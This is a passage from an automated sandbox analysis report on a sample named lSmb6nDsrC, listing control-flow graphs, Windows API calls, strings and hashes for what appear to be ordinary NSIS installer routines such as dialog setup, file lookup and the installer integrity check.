                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                    • String ID: {
                                                    • API String ID: 4154960007-366298937
                                                    • Opcode ID: b00847ff47827a43b93895459648fd8745bc42cf01a25ae6d3cf6e6dbf784441
                                                    • Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
                                                    • Opcode Fuzzy Hash: b00847ff47827a43b93895459648fd8745bc42cf01a25ae6d3cf6e6dbf784441
                                                    • Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 663 406c3f-406c44 664 406cb5-406cd3 663->664 665 406c46-406c75 663->665 668 4072ab-4072c0 664->668 666 406c77-406c7a 665->666 667 406c7c-406c80 665->667 669 406c8c-406c8f 666->669 670 406c82-406c86 667->670 671 406c88 667->671 672 4072c2-4072d8 668->672 673 4072da-4072f0 668->673 674 406c91-406c9a 669->674 675 406cad-406cb0 669->675 670->669 671->669 676 4072f3-4072fa 672->676 673->676 677 406c9c 674->677 678 406c9f-406cab 674->678 679 406e82-406ea0 675->679 680 407321-40732d 676->680 681 4072fc-407300 676->681 677->678 685 406d15-406d43 678->685 683 406ea2-406eb6 679->683 684 406eb8-406eca 679->684 688 406ac3-406acc 680->688 686 407306-40731e 681->686 687 4074af-4074b9 681->687 689 406ecd-406ed7 683->689 684->689 691 406d45-406d5d 685->691 692 406d5f-406d79 685->692 686->680 690 4074c5-4074d8 687->690 694 406ad2 688->694 695 4074da 688->695 697 406ed9 689->697 698 406e7a-406e80 689->698 696 4074dd-4074e1 690->696 693 406d7c-406d86 691->693 692->693 700 406d8c 693->700 701 406cfd-406d03 693->701 702 406ad9-406add 694->702 703 406c19-406c3a 694->703 704 406b7e-406b82 694->704 705 406bee-406bf2 694->705 695->696 717 407461-40746b 697->717 718 406e5f-406e77 697->718 698->679 699 406e1e-406e28 698->699 711 40746d-407477 699->711 712 406e2e-406ff7 699->712 723 406ce2-406cfa 700->723 724 407449-407453 700->724 713 406db6-406dbc 701->713 714 406d09-406d0f 701->714 702->690 708 406ae3-406af0 702->708 703->668 715 406b88-406ba1 704->715 716 40742e-407438 704->716 709 406bf8-406c0c 705->709 710 40743d-407447 705->710 708->695 719 406af6-406b3c 708->719 720 406c0f-406c17 709->720 710->690 711->690 712->668 712->688 721 406e1a 713->721 722 406dbe-406ddc 713->722 714->685 714->721 726 406ba4-406ba8 715->726 716->690 717->690 718->698 727 406b64-406b66 719->727 728 406b3e-406b42 719->728 720->703 720->705 721->699 729 406df4-406e06 722->729 730 406dde-406df2 722->730 723->701 724->690 726->704 731 406baa-406bb0 726->731 737 406b74-406b7c 727->737 738 406b68-406b72 727->738 734 406b44-406b47 GlobalFree 728->734 735 406b4d-406b5b GlobalAlloc 728->735 736 406e09-406e13 729->736 730->736 732 406bb2-406bb9 731->732 733 406bda-406bec 731->733 739 406bc4-406bd4 GlobalAlloc 732->739 740 406bbb-406bbe GlobalFree 732->740 733->720 734->735 735->695 741 406b61 735->741 736->713 742 406e15 736->742 737->726 738->737 738->738 739->695 739->733 740->739 741->727 744 407455-40745f 742->744 745 406d9b-406db3 742->745 744->690 745->713
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                    • Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
                                                    • Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                    • Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 782 40687e-406892 FindFirstFileW 783 406894-40689d FindClose 782->783 784 40689f 782->784 785 4068a1-4068a2 783->785 784->785
                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(771B3420,00425F58,00425710,00405F41,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C4D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00406889
                                                    • FindClose.KERNEL32(00000000), ref: 00406895
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID: X_B
                                                    • API String ID: 2295610775-941606717
                                                    • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                    • Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
                                                    • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                    • Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 200 403fa1-403fb3 201 403fb9-403fbf 200->201 202 40411a-404129 200->202 201->202 203 403fc5-403fce 201->203 204 404178-40418d 202->204 205 40412b-404173 GetDlgItem * 2 call 4044a0 SetClassLongW call 40140b 202->205 209 403fd0-403fdd SetWindowPos 203->209 210 403fe3-403fea 203->210 207 4041cd-4041d2 call 4044ec 204->207 208 40418f-404192 204->208 205->204 222 4041d7-4041f2 207->222 212 404194-40419f call 401389 208->212 213 4041c5-4041c7 208->213 209->210 215 403fec-404006 ShowWindow 210->215 216 40402e-404034 210->216 212->213 239 4041a1-4041c0 SendMessageW 212->239 213->207 221 40446d 213->221 223 404107-404115 call 404507 215->223 224 40400c-40401f GetWindowLongW 215->224 218 404036-404048 DestroyWindow 216->218 219 40404d-404050 216->219 227 40444a-404450 218->227 229 404052-40405e SetWindowLongW 219->229 230 404063-404069 219->230 228 40446f-404476 221->228 233 4041f4-4041f6 call 40140b 222->233 234 4041fb-404201 222->234 223->228 224->223 225 404025-404028 ShowWindow 224->225 225->216 227->221 235 404452-404458 227->235 229->228 230->223 238 40406f-40407e GetDlgItem 230->238 233->234 236 404207-404212 234->236 237 40442b-404444 DestroyWindow KiUserCallbackDispatcher 234->237 235->221 242 40445a-404463 ShowWindow 235->242 236->237 243 404218-404265 call 40655e call 4044a0 * 3 GetDlgItem 236->243 237->227 244 404080-404097 SendMessageW IsWindowEnabled 238->244 245 40409d-4040a0 238->245 239->228 242->221 272 404267-40426c 243->272 273 40426f-4042ab ShowWindow KiUserCallbackDispatcher call 4044c2 EnableWindow 243->273 244->221 244->245 247 4040a2-4040a3 245->247 248 4040a5-4040a8 245->248 250 4040d3-4040d8 call 404479 247->250 251 4040b6-4040bb 248->251 252 4040aa-4040b0 248->252 250->223 255 4040f1-404101 SendMessageW 251->255 257 4040bd-4040c3 251->257 252->255 256 4040b2-4040b4 252->256 255->223 256->250 260 4040c5-4040cb call 40140b 257->260 261 4040da-4040e3 call 40140b 257->261 268 4040d1 260->268 261->223 270 4040e5-4040ef 261->270 268->250 270->268 272->273 276 4042b0 273->276 277 4042ad-4042ae 273->277 278 4042b2-4042e0 GetSystemMenu EnableMenuItem SendMessageW 276->278 277->278 279 4042e2-4042f3 SendMessageW 278->279 280 4042f5 278->280 281 4042fb-40433a call 4044d5 call 403f82 call 406521 lstrlenW call 40655e SetWindowTextW call 401389 279->281 280->281 281->222 292 404340-404342 281->292 292->222 293 404348-40434c 292->293 294 40436b-40437f DestroyWindow 293->294 295 40434e-404354 293->295 294->227 297 404385-4043b2 CreateDialogParamW 294->297 295->221 296 40435a-404360 295->296 296->222 298 404366 296->298 297->227 299 4043b8-40440f call 4044a0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 297->299 298->221 299->221 304 404411-404424 ShowWindow call 4044ec 299->304 306 404429 304->306 306->227
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
                                                    • ShowWindow.USER32(?), ref: 00403FFD
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040400F
                                                    • ShowWindow.USER32(?,00000004), ref: 00404028
                                                    • DestroyWindow.USER32 ref: 0040403C
                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
                                                    • GetDlgItem.USER32(?,?), ref: 00404074
                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
                                                    • IsWindowEnabled.USER32(00000000), ref: 0040408F
                                                    • GetDlgItem.USER32(?,00000001), ref: 0040413A
                                                    • GetDlgItem.USER32(?,00000002), ref: 00404144
                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041AF
                                                    • GetDlgItem.USER32(?,00000003), ref: 00404255
                                                    • ShowWindow.USER32(00000000,?), ref: 00404276
                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
                                                    • EnableWindow.USER32(?,?), ref: 004042A3
                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B9
                                                    • EnableMenuItem.USER32(00000000), ref: 004042C0
                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D8
                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
                                                    • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
                                                    • SetWindowTextW.USER32(?,00422F08), ref: 00404329
                                                    • ShowWindow.USER32(?,0000000A), ref: 0040445D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                    • String ID:
                                                    • API String ID: 121052019-0
                                                    • Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                    • Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
                                                    • Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                    • Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 307 403bf3-403c0b call 406915 310 403c0d-403c18 GetUserDefaultUILanguage call 406468 307->310 311 403c1f-403c56 call 4063ef 307->311 314 403c1d 310->314 317 403c58-403c69 call 4063ef 311->317 318 403c6e-403c74 lstrcatW 311->318 316 403c79-403ca2 call 403ec9 call 405ef8 314->316 324 403d34-403d3c call 405ef8 316->324 325 403ca8-403cad 316->325 317->318 318->316 331 403d4a-403d6f LoadImageW 324->331 332 403d3e-403d45 call 40655e 324->332 325->324 326 403cb3-403cdb call 4063ef 325->326 326->324 333 403cdd-403ce1 326->333 335 403df0-403df8 call 40140b 331->335 336 403d71-403da1 RegisterClassW 331->336 332->331 337 403cf3-403cff lstrlenW 333->337 338 403ce3-403cf0 call 405e1d 333->338 347 403e02-403e0d call 403ec9 335->347 348 403dfa-403dfd 335->348 339 403da7-403deb SystemParametersInfoW CreateWindowExW 336->339 340 403ebf 336->340 345 403d01-403d0f lstrcmpiW 337->345 346 403d27-403d2f call 405df0 call 406521 337->346 338->337 339->335 344 403ec1-403ec8 340->344 345->346 351 403d11-403d1b GetFileAttributesW 345->351 346->324 359 403e13-403e2d ShowWindow call 4068a5 347->359 360 403e96-403e97 call 405679 347->360 348->344 354 403d21-403d22 call 405e3c 351->354 355 403d1d-403d1f 351->355 354->346 355->346 355->354 367 403e39-403e4b GetClassInfoW 359->367 368 403e2f-403e34 call 4068a5 359->368 363 403e9c-403e9e 360->363 365 403ea0-403ea6 363->365 366 403eb8-403eba call 40140b 363->366 365->348 369 403eac-403eb3 call 40140b 365->369 366->340 372 403e63-403e86 DialogBoxParamW call 40140b 367->372 373 403e4d-403e5d GetClassInfoW RegisterClassW 367->373 368->367 369->348 377 403e8b-403e94 call 403b43 372->377 373->372 377->344
                                                    APIs
                                                      • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                      • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                    • GetUserDefaultUILanguage.KERNELBASE(00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00434000,00008001), ref: 00403C0D
                                                      • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                    • lstrcatW.KERNEL32(1033,00422F08), ref: 00403C74
                                                    • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,00434800,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420), ref: 00403CF4
                                                    • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,00434800,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
                                                    • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D12
                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403D5B
                                                    • RegisterClassW.USER32(004289C0), ref: 00403D98
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E1B
                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
                                                    • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
                                                    • RegisterClassW.USER32(004289C0), ref: 00403E5D
                                                    • DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                    • API String ID: 606308-692862253
                                                    • Opcode ID: 0956769c01ddca14b96dea91265e8b7d4d10852685e549966d2ead3f546cae20
                                                    • Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
                                                    • Opcode Fuzzy Hash: 0956769c01ddca14b96dea91265e8b7d4d10852685e549966d2ead3f546cae20
                                                    • Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 380 403082-4030d0 GetTickCount GetModuleFileNameW call 406011 383 4030d2-4030d7 380->383 384 4030dc-40310a call 406521 call 405e3c call 406521 GetFileSize 380->384 385 4032b2-4032b6 383->385 392 403110 384->392 393 4031f5-403203 call 40301e 384->393 395 403115-40312c 392->395 399 403205-403208 393->399 400 403258-40325d 393->400 397 403130-403139 call 40349e 395->397 398 40312e 395->398 406 40325f-403267 call 40301e 397->406 407 40313f-403146 397->407 398->397 402 40320a-403222 call 4034b4 call 40349e 399->402 403 40322c-403256 GlobalAlloc call 4034b4 call 4032b9 399->403 400->385 402->400 428 403224-40322a 402->428 403->400 426 403269-40327a 403->426 406->400 411 4031c2-4031c6 407->411 412 403148-40315c call 405fcc 407->412 416 4031d0-4031d6 411->416 417 4031c8-4031cf call 40301e 411->417 412->416 431 40315e-403165 412->431 423 4031e5-4031ed 416->423 424 4031d8-4031e2 call 406a02 416->424 417->416 423->395 427 4031f3 423->427 424->423 433 403282-403287 426->433 434 40327c 426->434 427->393 428->400 428->403 431->416 432 403167-40316e 431->432 432->416 436 403170-403177 432->436 437 403288-40328e 433->437 434->433 436->416 438 403179-403180 436->438 437->437 439 403290-4032ab SetFilePointer call 405fcc 437->439 438->416 440 403182-4031a2 438->440 443 4032b0 439->443 440->400 442 4031a8-4031ac 440->442 444 4031b4-4031bc 442->444 445 4031ae-4031b2 442->445 443->385 444->416 446 4031be-4031c0 444->446 445->427 445->444 446->416
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00403093
                                                    • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030AF
                                                      • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
                                                      • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                    • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 004030FB
                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                    Strings
                                                    • Error launching installer, xrefs: 004030D2
                                                    • soft, xrefs: 00403170
                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403089
                                                    • C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
                                                    • Inst, xrefs: 00403167
                                                    • Null, xrefs: 00403179
                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                    • API String ID: 2803837635-4051493828
                                                    • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                    • Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
                                                    • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                    • Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 447 40655e-406567 448 406569-406578 447->448 449 40657a-406594 447->449 448->449 450 4067a4-4067aa 449->450 451 40659a-4065a6 449->451 453 4067b0-4067bd 450->453 454 4065b8-4065c5 450->454 451->450 452 4065ac-4065b3 451->452 452->450 456 4067c9-4067cc 453->456 457 4067bf-4067c4 call 406521 453->457 454->453 455 4065cb-4065d4 454->455 459 406791 455->459 460 4065da-40661d 455->460 457->456 461 406793-40679d 459->461 462 40679f-4067a2 459->462 463 406623-40662f 460->463 464 406735-406739 460->464 461->450 462->450 465 406631 463->465 466 406639-40663b 463->466 467 40673b-406742 464->467 468 40676d-406771 464->468 465->466 469 406675-406678 466->469 470 40663d-406663 call 4063ef 466->470 473 406752-40675e call 406521 467->473 474 406744-406750 call 406468 467->474 471 406781-40678f lstrlenW 468->471 472 406773-40677c call 40655e 468->472 478 40667a-406686 GetSystemDirectoryW 469->478 479 40668b-40668e 469->479 487 406669-406670 call 40655e 470->487 488 40671d-406720 470->488 471->450 472->471 483 406763-406769 473->483 474->483 484 406718-40671b 478->484 485 4066a0-4066a4 479->485 486 406690-40669c GetWindowsDirectoryW 479->486 483->471 489 40676b 483->489 484->488 490 40672d-406733 call 4067cf 484->490 485->484 491 4066a6-4066c4 485->491 486->485 487->484 488->490 493 406722-406728 lstrcatW 488->493 489->490 490->471 495 4066c6-4066cc 491->495 496 4066d8-4066f0 call 406915 491->496 493->490 501 4066d4-4066d6 495->501 504 4066f2-406705 SHGetPathFromIDListW CoTaskMemFree 496->504 505 406707-406710 496->505 501->496 502 406712-406716 501->502 502->484 504->502 504->505 505->491 505->502
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406680
                                                    • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
                                                    • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 004066F4
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
                                                    • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406728
                                                    • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
